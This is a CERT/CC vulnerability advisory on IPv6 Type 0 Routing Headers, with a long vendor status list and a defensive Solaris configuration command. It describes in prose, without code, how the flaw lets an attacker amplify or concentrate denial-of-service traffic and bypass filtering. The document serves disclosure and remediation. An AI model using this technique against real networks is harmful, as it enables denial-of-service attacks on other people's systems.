search menu icon-carat-right cmu-wordmark

CERT Coordination Center

IPv6 Type 0 Route Headers allow sender to control routing

Vulnerability Note VU#267289

Original Release Date: 2007-06-01 | Last Revised: 2011-07-22

Overview

IPv6 Type 0 Route Headers allow the sender to control packet routing. This vulnerability may allow an attacker to cause a denial-of-service condition.

Description

Routing header options provided by IPv6 allow packet senders to indicate specific nodes through which the packet should travel. Note that a node is defined as any device that implements IPv6, which includes hosts as well as routing devices. According to FreeBSD-SA-07:03.ipv6:

An attacker can "amplify" a denial of service attack against a link between two vulnerable hosts; that is, by sending a small volume of traffic the attacker can consume a much larger amount of bandwidth between the two vulnerable hosts.

An attacker can use vulnerable hosts to "concentrate" a denial of service attack against a victim host or network; that is, a set of packets sent over a period of 30 seconds or more could be constructed such that they all arrive at the victim within a period of 1 second or less.

Impact

This condition can facilitate a number of different impacts including packet amplification, bypassing filtering devices, denial of service, and defeating IPv6 Anycast.

Solution

Update

See the systems affected portion of this document for information about updates for specific vendors.

Vendor Information

267289
 

Apple Computer, Inc. Affected

Notified:  May 09, 2007 Updated: June 21, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to Apple Mac OS X 10.4.10 Update.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Cisco Systems, Inc. Affected

Notified:  May 09, 2007 Updated: May 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD, Inc. Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to FreeBSD-SA-07:03.ipv6.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Fujitsu Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://software.fujitsu.com/jp/security/vulnerabilities/vu267289.html.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Hitachi Affected

Notified:  May 09, 2007 Updated: May 14, 2007

Status

Affected

Vendor Statement

AlaxalA AX series (except AX1200S/AX2400S series) and Hitachi GR4000/GR2000/GS4000/GS3000 are vulnerable to this issue. Note that AlaxalA AX series (except AX1200S/AX2400S series) and Hitachi GR4000/GR2000/GS4000/GS3000 have a threshold mechanism to ignore IPv6 Routing Header Type 0. This mechanism limits the impact of possible attacks.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Internet Initiative Japan Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://www.seil.jp/en/news/snote/snote_200705_01_en.html

If you have feedback, comments, or additional information about this vulnerability, please send us email.

NEC Corporation Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://www.nec.co.jp/psirt/index.html (Japanese only).

If you have feedback, comments, or additional information about this vulnerability, please send us email.

OpenBSD Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://openbsd.org/errata40.html#012_route6.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Red Hat, Inc. Affected

Updated:  May 17, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to RHSA-2007-0347.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Secure Computing Network Security Division Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

Sidewinder G2, Sidewinder 7, and TSP: Not Vulnerable

By default, Sidewinder ignores routing header 0, and strips it from datagrams
passing through the firewall.

TSP drops IPv6 datagrams containing routing headers.


SnapGear: Vulnerable

SnapGear products at version 3.1.5 and earlier honor IPv6 routing header 0.
This will be corrected in an upcoming release.

This vulnerability is not relevant to any other Secure Computing products.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Sun Microsystems, Inc. Affected

Notified:  May 09, 2007 Updated: May 17, 2007

Statement Date:   May 16, 2007

Status

Affected

Vendor Statement

Sun can confirm that while Solaris has support for the IPv6 Routing Header type 0 that is described in VU#267289, packets containing this header extension are discarded by default on Solaris 9 and 10, and Solaris 8 can be configured to discard them by setting a kernel driver parameter.

For Solaris systems, this setting is controlled by the ip6_forward_src_routed kernel driver parameter, which defaults to 1 on Solaris 8 systems, and 0 on later systems. The 'ndd(1M)' command can be used to set this variable, for example to set it for the current session the command could be used as follows:

# ndd -set /dev/ip ip6_forward_src_routed 0

More details are available from the following blog post:

http://blogs.sun.com/security/entry/ipv6_routing_header_issues

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

rPath Affected

Updated:  June 21, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to rPSA-2007-0124-1.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Force10 Networks, Inc. Not Affected

Notified:  May 09, 2007 Updated: July 22, 2011

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Novell, Inc. Not Affected

Notified:  May 09, 2007 Updated: May 17, 2007

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

3com, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

AT&T Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Alcatel Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Avaya, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Avici Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Borderware Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Charlotte's Web Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Chiaro Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Clavister Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Computer Associates Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Cray Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

D-Link Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Data Connection, Ltd. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

EMC, Inc. (formerly Data General Corporation) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Ericsson Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Extreme Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

F5 Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Foundry Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hewlett-Packard Company Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hyperchip Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation (zseries) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM eServer Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IP Filter Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Ingrian Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Internet Security Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intoto Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Juniper Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Linksys (A division of Cisco Systems) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Lucent Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Luminous Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Microsoft Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

MontaVista Software, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Multinet (owned Process Software Corporation) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Multitech, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

NetBSD Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Network Appliance, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

NextHop Technologies, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Nokia Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Nortel Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

QNX, Software Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Redback Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Riverstone Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Secureworx, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Silicon Graphics, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Sony Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Stonesoft Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Symantec, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

The SCO Group Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Unisys Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Wind River Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ZyXEL Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

netfilter Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

View all 73 vendors View less vendors


CVSS Metrics

Group Score Vector
Base
Temporal
Environmental

References

Acknowledgements

This vulnerability was reported by Philippe Biondi Arnaud Ebalard of EADS Innovation Works — IW/SE/CS, IT Sec lab, Suresnes, France at CanSecWest 2007.

This document was written by Chris Taschner.

Other Information

CVE IDs: CVE-2007-2242
Severity Metric: 11.03
Date Public: 2007-04-24
Date First Published: 2007-06-01
Date Last Updated: 2011-07-22 12:54 UTC
Document Revision: 39

Sponsored by CISA.